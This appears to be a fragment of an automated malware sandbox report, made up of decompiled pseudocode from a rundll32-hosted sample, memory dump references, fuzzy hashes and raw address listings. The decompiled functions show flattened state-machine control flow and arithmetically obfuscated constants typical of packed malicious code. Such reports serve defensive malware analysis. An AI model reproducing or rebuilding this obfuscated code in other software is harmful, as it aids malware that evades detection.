                                                                                                                                  				_v4 = _v4 + 0xffff373f;
                                                                                                                                  				_v4 = _v4 | 0x7532efd9;
                                                                                                                                  				_v4 = _v4 ^ 0x75785e39;
                                                                                                                                  				_v8 = 0x709bec;
                                                                                                                                  				_v8 = _v8 + 0xffffb2bc;
                                                                                                                                  				_v8 = _v8 + 0xffff08e7;
                                                                                                                                  				_v8 = _v8 ^ 0x006dec69;
                                                                                                                                  				_v12 = 0xe79dac;
                                                                                                                                  				_v12 = _v12 * 0x78;
                                                                                                                                  				_v12 = _v12 + 0xb337;
                                                                                                                                  				_v12 = _v12 ^ 0x6c9daebe;
                                                                                                                                  				do {
                                                                                                                                  					while(_t125 != 0x2aa38ff) {
                                                                                                                                  						if(_t125 == 0x81ec960) {
                                                                                                                                  							_t124 = _t124 + E002EC2F8(_v32, _t116 + 0x38, _v4, _v8, _v12);
                                                                                                                                  						} else {
                                                                                                                                  							if(_t125 == 0xa7224d4) {
                                                                                                                                  								_t118 = _v16;
                                                                                                                                  								_t111 = E002EC2F8(_t118, _t116 + 0x14, _v36, _v40, _v20);
                                                                                                                                  								_t127 =  &(_t127[3]);
                                                                                                                                  								_t125 = 0x81ec960;
                                                                                                                                  								_t124 = _t124 + _t111;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t125 != 0xcb4deb0) {
                                                                                                                                  									goto L8;
                                                                                                                                  								} else {
                                                                                                                                  									_push(_t118);
                                                                                                                                  									_push(_t118);
                                                                                                                                  									_t115 = E002D474B();
                                                                                                                                  									_t127 =  &(_t127[2]);
                                                                                                                                  									_t125 = 0xa7224d4;
                                                                                                                                  									_t124 = _t124 + _t115;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L11:
                                                                                                                                  						return _t124;
                                                                                                                                  					}
                                                                                                                                  					_t125 = 0xcb4deb0;
                                                                                                                                  					L8:
                                                                                                                                  				} while (_t125 != 0x4501b46);
                                                                                                                                  				goto L11;
                                                                                                                                  			}






















                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 9^xu$fj$im
                                                                                                                                  • API String ID: 0-3261451082
                                                                                                                                  • Opcode ID: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                                  • Instruction ID: e29da9798987f1eeb5db65d2b8b4e8dca9a23572cef6bc96f97c6f035c6bcf05
                                                                                                                                  • Opcode Fuzzy Hash: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                                  • Instruction Fuzzy Hash: F65168B24183429BC784CF25D48541BFBE0BFD83A8F501A1DF59566261D3B4CA59CF87
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                  			E002E6C49(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				intOrPtr _v56;
                                                                                                                                  				char _v88;
                                                                                                                                  				char _v608;
                                                                                                                                  				void* _t92;
                                                                                                                                  				void* _t96;
                                                                                                                                  				void* _t101;
                                                                                                                                  				void* _t112;
                                                                                                                                  				void* _t113;
                                                                                                                                  
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t92);
                                                                                                                                  				_v52 = _v52 & 0x00000000;
                                                                                                                                  				_v56 = 0x878462;
                                                                                                                                  				_t113 = _t112 + 0x14;
                                                                                                                                  				_v32 = 0x956791;
                                                                                                                                  				_t101 = 0x1300659;
                                                                                                                                  				_v32 = _v32 + 0xffff68af;
                                                                                                                                  				_v32 = _v32 ^ 0x0094d050;
                                                                                                                                  				_v48 = 0xb6c679;
                                                                                                                                  				_v48 = _v48 * 9;
                                                                                                                                  				_v48 = _v48 ^ 0x0662f925;
                                                                                                                                  				_v16 = 0xd9c762;
                                                                                                                                  				_v16 = _v16 << 1;
                                                                                                                                  				_v16 = _v16 | 0xb4c78449;
                                                                                                                                  				_v16 = _v16 ^ 0xb5f30401;
                                                                                                                                  				_v40 = 0x8b331e;
                                                                                                                                  				_v40 = _v40 >> 0xc;
                                                                                                                                  				_v40 = _v40 ^ 0x000c5129;
                                                                                                                                  				_v28 = 0x1269f4;
                                                                                                                                  				_v28 = _v28 >> 4;
                                                                                                                                  				_v28 = _v28 ^ 0x0007e996;
                                                                                                                                  				_v44 = 0xabd705;
                                                                                                                                  				_v44 = _v44 ^ 0x9c90d177;
                                                                                                                                  				_v44 = _v44 ^ 0x9c3fe788;
                                                                                                                                  				_v8 = 0x357d72;
                                                                                                                                  				_v8 = _v8 + 0xd90c;
                                                                                                                                  				_v8 = _v8 ^ 0xccfdbdcb;
                                                                                                                                  				_v8 = _v8 >> 3;
                                                                                                                                  				_v8 = _v8 ^ 0x199e890f;
                                                                                                                                  				_v12 = 0x32e6;
                                                                                                                                  				_v12 = _v12 ^ 0x74a35607;
                                                                                                                                  				_v12 = _v12 | 0x704b9008;
                                                                                                                                  				_v12 = _v12 + 0xffff83aa;
                                                                                                                                  				_v12 = _v12 ^ 0x74eee325;
                                                                                                                                  				_v36 = 0xeddfb6;
                                                                                                                                  				_v36 = _v36 << 0xa;
                                                                                                                                  				_v36 = _v36 ^ 0xb77b8cf2;
                                                                                                                                  				_v24 = 0xe2b758;
                                                                                                                                  				_v24 = _v24 << 5;
                                                                                                                                  				_v24 = _v24 * 0x38;
                                                                                                                                  				_v24 = _v24 ^ 0x330719f5;
                                                                                                                                  				_v20 = 0x9236d6;
                                                                                                                                  				_v20 = _v20 | 0x3f0523f5;
                                                                                                                                  				_v20 = _v20 >> 0xd;
                                                                                                                                  				_v20 = _v20 ^ 0x000835ca;
                                                                                                                                  				do {
                                                                                                                                  					while(_t101 != 0x1300659) {
                                                                                                                                  						if(_t101 == 0xa264c44) {
                                                                                                                                  							_t96 = E002D9D31(_v40,  &_v608, _v28, _t101, _v44, _v8);
                                                                                                                                  							_t113 = _t113 + 0x10;
                                                                                                                                  							_t101 = 0xbcabc0e;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t101 != 0xbcabc0e) {
                                                                                                                                  							goto L8;
                                                                                                                                  						}
                                                                                                                                  						return E002E6637( &_v88, _v12, _v36, _v24,  &_v608, _a12, _v20);
                                                                                                                                  					}
                                                                                                                                  					_t96 = E002D4B61( &_v88, _v32, _v48, _v16);
                                                                                                                                  					_t101 = 0xa264c44;
                                                                                                                                  					L8:
                                                                                                                                  				} while (_t101 != 0x478adce);
                                                                                                                                  				return _t96;
                                                                                                                                  			}
























                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %t$DL&$r}5
                                                                                                                                  • API String ID: 0-2337153543
                                                                                                                                  • Opcode ID: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                                  • Instruction ID: 8cdfd53a694319f663691077a733c9b470a2c2a588e4d1a7a5ad2c2fc77fa201
                                                                                                                                  • Opcode Fuzzy Hash: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                                  • Instruction Fuzzy Hash: 97413271D0020EEBCF09DFE1D94A4EEBBB1FB58318F608089D41276260D3B54A59CFA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                                    • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                                    • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1958600898-0
                                                                                                                                  • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                                  • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                                  • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                                  • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E002E1889(void* __ecx) {
                                                                                                                                  				char _v520;
                                                                                                                                  				char _v1040;
                                                                                                                                  				char _v1560;
                                                                                                                                  				short _v1564;
                                                                                                                                  				intOrPtr _v1568;
                                                                                                                                  				signed int _v1572;
                                                                                                                                  				signed int _v1576;
                                                                                                                                  				signed int _v1580;
                                                                                                                                  				signed int _v1584;
                                                                                                                                  				signed int _v1588;
                                                                                                                                  				signed int _v1592;
                                                                                                                                  				signed int _v1596;
                                                                                                                                  				signed int _v1600;
                                                                                                                                  				signed int _v1604;
                                                                                                                                  				signed int _v1608;
                                                                                                                                  				signed int _v1612;
                                                                                                                                  				signed int _v1616;
                                                                                                                                  				signed int _v1620;
                                                                                                                                  				signed int _v1624;
                                                                                                                                  				signed int _v1628;
                                                                                                                                  				signed int _v1632;
                                                                                                                                  				signed int _v1636;
                                                                                                                                  				signed int _v1640;
                                                                                                                                  				signed int _v1644;
                                                                                                                                  				signed int _v1648;
                                                                                                                                  				signed int _v1652;
                                                                                                                                  				signed int _v1656;
                                                                                                                                  				signed int _v1660;
                                                                                                                                  				signed int _v1664;
                                                                                                                                  				signed int _v1668;
                                                                                                                                  				signed int _v1672;
                                                                                                                                  				signed int _v1676;
                                                                                                                                  				signed int _v1680;
                                                                                                                                  				signed int _t323;
                                                                                                                                  				signed int _t334;
                                                                                                                                  				signed int _t337;
                                                                                                                                  				signed int _t338;
                                                                                                                                  				signed int _t339;
                                                                                                                                  				signed int _t340;
                                                                                                                                  				signed int _t341;
                                                                                                                                  				signed int _t342;
                                                                                                                                  				signed int _t343;
                                                                                                                                  				signed int _t344;
                                                                                                                                  				signed int _t345;
                                                                                                                                  				signed int _t346;
                                                                                                                                  				void* _t386;
                                                                                                                                  				void* _t387;
                                                                                                                                  				signed int* _t390;
                                                                                                                                  
                                                                                                                                  				_t390 =  &_v1680;
                                                                                                                                  				_v1568 = 0xdfec4c;
                                                                                                                                  				_t386 = __ecx;
                                                                                                                                  				_v1564 = 0;
                                                                                                                                  				_t387 = 0xea1969c;
                                                                                                                                  				_v1596 = 0xb94d4f;
                                                                                                                                  				_v1596 = _v1596 >> 2;
                                                                                                                                  				_v1596 = _v1596 ^ 0x002b88ba;
                                                                                                                                  				_v1604 = 0x7820e8;
                                                                                                                                  				_t9 =  &_v1604; // 0x7820e8
                                                                                                                                  				_t337 = 0x3f;
                                                                                                                                  				_v1604 =  *_t9 / _t337;
                                                                                                                                  				_v1604 = _v1604 << 6;
                                                                                                                                  				_v1604 = _v1604 ^ 0x0075b154;
                                                                                                                                  				_v1676 = 0xd796f6;
                                                                                                                                  				_v1676 = _v1676 << 7;
                                                                                                                                  				_t338 = 0x1f;
                                                                                                                                  				_v1676 = _v1676 / _t338;
                                                                                                                                  				_v1676 = _v1676 | 0x34dfec15;
                                                                                                                                  				_v1676 = _v1676 ^ 0x37fcd475;
                                                                                                                                  				_v1580 = 0x701ced;
                                                                                                                                  				_t339 = 0x3b;
                                                                                                                                  				_v1580 = _v1580 / _t339;
                                                                                                                                  				_v1580 = _v1580 ^ 0x000eda5b;
                                                                                                                                  				_v1584 = 0x3864f;
                                                                                                                                  				_v1584 = _v1584 | 0xebab6106;
                                                                                                                                  				_v1584 = _v1584 ^ 0xeba3c8dc;
                                                                                                                                  				_v1668 = 0x7d6229;
                                                                                                                                  				_v1668 = _v1668 + 0x90f9;
                                                                                                                                  				_t340 = 0x7d;
                                                                                                                                  				_v1668 = _v1668 * 0xd;
                                                                                                                                  				_v1668 = _v1668 + 0x17d6;
                                                                                                                                  				_v1668 = _v1668 ^ 0x06671cb6;
                                                                                                                                  				_v1652 = 0x8dafad;
                                                                                                                                  				_v1652 = _v1652 + 0xffffa237;
                                                                                                                                  				_v1652 = _v1652 / _t340;
                                                                                                                                  				_v1652 = _v1652 ^ 0xeab94c45;
                                                                                                                                  				_v1652 = _v1652 ^ 0xeabb4144;
                                                                                                                                  				_v1620 = 0x364acf;
                                                                                                                                  				_v1620 = _v1620 + 0xffffd559;
                                                                                                                                  				_v1620 = _v1620 ^ 0x476b0832;
                                                                                                                                  				_v1620 = _v1620 ^ 0x4757dcec;
                                                                                                                                  				_v1660 = 0xdffac8;
                                                                                                                                  				_v1660 = _v1660 | 0xd3f81aab;
                                                                                                                                  				_t341 = 0xd;
                                                                                                                                  				_v1660 = _v1660 / _t341;
                                                                                                                                  				_v1660 = _v1660 + 0x2ca8;
                                                                                                                                  				_v1660 = _v1660 ^ 0x10473906;
                                                                                                                                  				_v1636 = 0xafa95;
                                                                                                                                  				_v1636 = _v1636 | 0x12b9adda;
                                                                                                                                  				_v1636 = _v1636 + 0xca30;
                                                                                                                                  				_t342 = 0x24;
                                                                                                                                  				_v1636 = _v1636 / _t342;
                                                                                                                                  				_v1636 = _v1636 ^ 0x008bc8e6;
                                                                                                                                  				_v1612 = 0xa1b06d;
                                                                                                                                  				_v1612 = _v1612 ^ 0xd927b519;
                                                                                                                                  				_t334 = 0x1c;
                                                                                                                                  				_v1612 = _v1612 / _t334;
                                                                                                                                  				_v1612 = _v1612 ^ 0x07c55aff;
                                                                                                                                  				_v1628 = 0xe475d7;
                                                                                                                                  				_v1628 = _v1628 + 0xf351;
                                                                                                                                  				_v1628 = _v1628 >> 9;
                                                                                                                                  				_v1628 = _v1628 ^ 0x000b149a;
                                                                                                                                  				_v1644 = 0xc98f78;
                                                                                                                                  				_v1644 = _v1644 + 0xa497;
                                                                                                                                  				_v1644 = _v1644 + 0xab0a;
                                                                                                                                  				_v1644 = _v1644 ^ 0x9916dffd;
                                                                                                                                  				_v1644 = _v1644 ^ 0x99d32d23;
                                                                                                                                  				_v1572 = 0xdb2c8b;
                                                                                                                                  				_v1572 = _v1572 ^ 0xa2354bd4;
                                                                                                                                  				_v1572 = _v1572 ^ 0xa2e9b3f6;
                                                                                                                                  				_v1616 = 0x8ac290;
                                                                                                                                  				_v1616 = _v1616 | 0xd6340cba;
                                                                                                                                  				_t343 = 0x17;
                                                                                                                                  				_v1616 = _v1616 / _t343;
                                                                                                                                  				_v1616 = _v1616 ^ 0x095403ec;
                                                                                                                                  				_v1624 = 0xc9b33;
                                                                                                                                  				_v1624 = _v1624 | 0xadec2c36;
                                                                                                                                  				_t344 = 0x23;
                                                                                                                                  				_v1624 = _v1624 / _t344;
                                                                                                                                  				_v1624 = _v1624 ^ 0x04f29945;
                                                                                                                                  				_v1672 = 0xce6284;
                                                                                                                                  				_t345 = 0x1b;
                                                                                                                                  				_v1672 = _v1672 * 0x47;
                                                                                                                                  				_v1672 = _v1672 >> 0xb;
                                                                                                                                  				_v1672 = _v1672 | 0xab5418c0;
                                                                                                                                  				_v1672 = _v1672 ^ 0xab589207;
                                                                                                                                  				_v1680 = 0xfb4294;
                                                                                                                                  				_v1680 = _v1680 * 0x56;
                                                                                                                                  				_v1680 = _v1680 >> 0xe;
                                                                                                                                  				_v1680 = _v1680 >> 4;
                                                                                                                                  				_v1680 = _v1680 ^ 0x000a896c;
                                                                                                                                  				_v1576 = 0xa0fe48;
                                                                                                                                  				_v1576 = _v1576 / _t345;
                                                                                                                                  				_v1576 = _v1576 ^ 0x000b8e8e;
                                                                                                                                  				_v1608 = 0x915f33;
                                                                                                                                  				_v1608 = _v1608 + 0xfa43;
                                                                                                                                  				_v1608 = _v1608 >> 0xc;
                                                                                                                                  				_v1608 = _v1608 ^ 0x000a30cc;
                                                                                                                                  				_v1648 = 0x21b71b;
                                                                                                                                  				_v1648 = _v1648 ^ 0x78ef874e;
                                                                                                                                  				_v1648 = _v1648 | 0x9c246086;
                                                                                                                                  				_v1648 = _v1648 * 0x4a;
                                                                                                                                  				_v1648 = _v1648 ^ 0x1ce73be6;
                                                                                                                                  				_v1592 = 0x926794;
                                                                                                                                  				_v1592 = _v1592 + 0xffff6f6e;
                                                                                                                                  				_v1592 = _v1592 ^ 0x009c0ed2;
                                                                                                                                  				_v1656 = 0x919083;
                                                                                                                                  				_v1656 = _v1656 / _t334;
                                                                                                                                  				_v1656 = _v1656 >> 2;
                                                                                                                                  				_t346 = 0x67;
                                                                                                                                  				_v1656 = _v1656 / _t346;
                                                                                                                                  				_v1656 = _v1656 ^ 0x0003c4fa;
                                                                                                                                  				_v1664 = 0xb12839;
                                                                                                                                  				_v1664 = _v1664 ^ 0xbcb8295e;
                                                                                                                                  				_v1664 = _v1664 + 0xe70b;
                                                                                                                                  				_v1664 = _v1664 + 0xffffbcc9;
                                                                                                                                  				_v1664 = _v1664 ^ 0xbc0a928f;
                                                                                                                                  				_v1600 = 0x37ff42;
                                                                                                                                  				_v1600 = _v1600 + 0xffff03fd;
                                                                                                                                  				_v1600 = _v1600 >> 3;
                                                                                                                                  				_v1600 = _v1600 ^ 0x000f4750;
                                                                                                                                  				_v1632 = 0xbb4856;
                                                                                                                                  				_v1632 = _v1632 * 0x4e;
                                                                                                                                  				_v1632 = _v1632 | 0xf74fdfff;
                                                                                                                                  				_v1632 = _v1632 ^ 0xff54b7ec;
                                                                                                                                  				_v1640 = 0x73c8d7;
                                                                                                                                  				_v1640 = _v1640 * 0x56;
                                                                                                                                  				_v1640 = _v1640 << 0xb;
                                                                                                                                  				_v1640 = _v1640 >> 7;
                                                                                                                                  				_v1640 = _v1640 ^ 0x005dc3ee;
                                                                                                                                  				_v1588 = 0xe2f656;
                                                                                                                                  				_t323 = _v1588 * 0x57;
                                                                                                                                  				_v1588 = _t323;
                                                                                                                                  				_v1588 = _v1588 ^ 0x4d200bca;
                                                                                                                                  				while(_t387 != 0x5de06da) {
                                                                                                                                  					if(_t387 == 0xea1969c) {
                                                                                                                                  						_t387 = 0xfa9128f;
                                                                                                                                  						continue;
                                                                                                                                  					} else {
                                                                                                                                  						_t395 = _t387 - 0xfa9128f;
                                                                                                                                  						if(_t387 != 0xfa9128f) {
                                                                                                                                  							L8:
                                                                                                                                  							__eflags = _t387 - 0xa8e801c;
                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							E002EDA22(_v1596, _v1604, _t395, _v1676,  &_v1040, _t346, _v1580);
                                                                                                                                  							 *((short*)(E002DB6CF( &_v1040, _v1584, _v1668, _v1652))) = 0;
                                                                                                                                  							E002D8969(_v1620,  &_v520, _t395, _v1660, _v1636);
                                                                                                                                  							_push(_v1644);
                                                                                                                                  							_push(_v1628);
                                                                                                                                  							E002D47CE( &_v1040, _v1572, _v1612, _v1616, _v1624, E002EDCF7(_v1612, 0x2d1328, _t395),  &_v520, _v1672, _v1680);
                                                                                                                                  							E002DA8B0(_v1576, _t329, _v1608);
                                                                                                                                  							_t346 = _v1648;
                                                                                                                                  							_t323 = E002DEA99(_t346, _t386, _v1592, _v1656,  &_v1560, _v1664);
                                                                                                                                  							_t390 =  &(_t390[0x17]);
                                                                                                                                  							if(_t323 != 0) {
                                                                                                                                  								_t387 = 0x5de06da;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _t323;
                                                                                                                                  				}
                                                                                                                                  				_push(_v1588);
                                                                                                                                  				_push( &_v1560);
                                                                                                                                  				_push(_t346);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(_v1640);
                                                                                                                                  				_t346 = _v1600;
                                                                                                                                  				_push(0);
                                                                                                                                  				_t323 = E002DAB87(_t346, _v1632, __eflags);
                                                                                                                                  				_t390 =  &(_t390[7]);
                                                                                                                                  				_t387 = 0xa8e801c;
                                                                                                                                  				goto L8;
                                                                                                                                  			}



















































                                                                                                                                  0x002e1a1f
                                                                                                                                  0x002e1a27
                                                                                                                                  0x002e1a35
                                                                                                                                  0x002e1a3a
                                                                                                                                  0x002e1a3e
                                                                                                                                  0x002e1a46
                                                                                                                                  0x002e1a4e
                                                                                                                                  0x002e1a56
                                                                                                                                  0x002e1a5b
                                                                                                                                  0x002e1a63
                                                                                                                                  0x002e1a6b
                                                                                                                                  0x002e1a73
                                                                                                                                  0x002e1a7b
                                                                                                                                  0x002e1a83
                                                                                                                                  0x002e1a8b
                                                                                                                                  0x002e1a93
                                                                                                                                  0x002e1a9b
                                                                                                                                  0x002e1aa3
                                                                                                                                  0x002e1aab
                                                                                                                                  0x002e1ab9
                                                                                                                                  0x002e1abe
                                                                                                                                  0x002e1ac2
                                                                                                                                  0x002e1aca
                                                                                                                                  0x002e1ad2
                                                                                                                                  0x002e1ae0
                                                                                                                                  0x002e1ae5
                                                                                                                                  0x002e1ae9
                                                                                                                                  0x002e1af1
                                                                                                                                  0x002e1b00
                                                                                                                                  0x002e1b01
                                                                                                                                  0x002e1b05
                                                                                                                                  0x002e1b0a
                                                                                                                                  0x002e1b12
                                                                                                                                  0x002e1b1a
                                                                                                                                  0x002e1b27
                                                                                                                                  0x002e1b2b
                                                                                                                                  0x002e1b30
                                                                                                                                  0x002e1b35
                                                                                                                                  0x002e1b3d
                                                                                                                                  0x002e1b4d
                                                                                                                                  0x002e1b51
                                                                                                                                  0x002e1b59
                                                                                                                                  0x002e1b61
                                                                                                                                  0x002e1b69
                                                                                                                                  0x002e1b6e
                                                                                                                                  0x002e1b76
                                                                                                                                  0x002e1b7e
                                                                                                                                  0x002e1b86
                                                                                                                                  0x002e1b93
                                                                                                                                  0x002e1b97
                                                                                                                                  0x002e1b9f
                                                                                                                                  0x002e1ba7
                                                                                                                                  0x002e1baf
                                                                                                                                  0x002e1bb7
                                                                                                                                  0x002e1bc5
                                                                                                                                  0x002e1bc9
                                                                                                                                  0x002e1bd6
                                                                                                                                  0x002e1bde
                                                                                                                                  0x002e1be2
                                                                                                                                  0x002e1bea
                                                                                                                                  0x002e1bf2
                                                                                                                                  0x002e1bfa
                                                                                                                                  0x002e1c02
                                                                                                                                  0x002e1c0a
                                                                                                                                  0x002e1c12
                                                                                                                                  0x002e1c1a
                                                                                                                                  0x002e1c22
                                                                                                                                  0x002e1c27
                                                                                                                                  0x002e1c2f
                                                                                                                                  0x002e1c3c
                                                                                                                                  0x002e1c40
                                                                                                                                  0x002e1c48
                                                                                                                                  0x002e1c50
                                                                                                                                  0x002e1c5d
                                                                                                                                  0x002e1c61
                                                                                                                                  0x002e1c66
                                                                                                                                  0x002e1c6b
                                                                                                                                  0x002e1c73
                                                                                                                                  0x002e1c7b
                                                                                                                                  0x002e1c80
                                                                                                                                  0x002e1c84
                                                                                                                                  0x002e1c8c
                                                                                                                                  0x002e1c9a
                                                                                                                                  0x002e1d93
                                                                                                                                  0x00000000
                                                                                                                                  0x002e1ca0
                                                                                                                                  0x002e1ca0
                                                                                                                                  0x002e1ca6
                                                                                                                                  0x002e1dc6
                                                                                                                                  0x002e1dc6
                                                                                                                                  0x002e1dcc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e1cac
                                                                                                                                  0x002e1cc5
                                                                                                                                  0x002e1cf6
                                                                                                                                  0x002e1cfd
                                                                                                                                  0x002e1d02
                                                                                                                                  0x002e1d0b
                                                                                                                                  0x002e1d4c
                                                                                                                                  0x002e1d5e
                                                                                                                                  0x002e1d7c
                                                                                                                                  0x002e1d80
                                                                                                                                  0x002e1d85
                                                                                                                                  0x002e1d8a
                                                                                                                                  0x002e1d8c
                                                                                                                                  0x00000000
                                                                                                                                  0x002e1d8c
                                                                                                                                  0x002e1d8a
                                                                                                                                  0x002e1ca6
                                                                                                                                  0x002e1ddc
                                                                                                                                  0x002e1ddc
                                                                                                                                  0x002e1d9d
                                                                                                                                  0x002e1da8
                                                                                                                                  0x002e1da9
                                                                                                                                  0x002e1daa
                                                                                                                                  0x002e1dab
                                                                                                                                  0x002e1dac
                                                                                                                                  0x002e1db4
                                                                                                                                  0x002e1db8
                                                                                                                                  0x002e1db9
                                                                                                                                  0x002e1dbe
                                                                                                                                  0x002e1dc1
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: )b}$ x
                                                                                                                                  • API String ID: 0-2724122486
                                                                                                                                  • Opcode ID: 676e3bfc762169acb8f75ac3539916bc1bbe830c842e832d961dfc938dba5cde
                                                                                                                                  • Instruction ID: c570335adc0e5bf30e12f53d2ee2c04c676c06b8a8ff439d47f06ebfb6447967
                                                                                                                                  • Opcode Fuzzy Hash: 676e3bfc762169acb8f75ac3539916bc1bbe830c842e832d961dfc938dba5cde
                                                                                                                                  • Instruction Fuzzy Hash: 7ED1317150C3819FE368CF21C48A95BFBE2FBC4358F508A2DF29986260D7B58959CF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 99%
                                                                                                                                  			E002E473C() {
                                                                                                                                  				intOrPtr _v4;
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				void* _t218;
                                                                                                                                  				signed int _t219;
                                                                                                                                  				void* _t225;
                                                                                                                                  				void* _t246;
                                                                                                                                  				intOrPtr _t251;
                                                                                                                                  				signed int _t252;
                                                                                                                                  				signed int _t253;
                                                                                                                                  				signed int _t254;
                                                                                                                                  				signed int _t255;
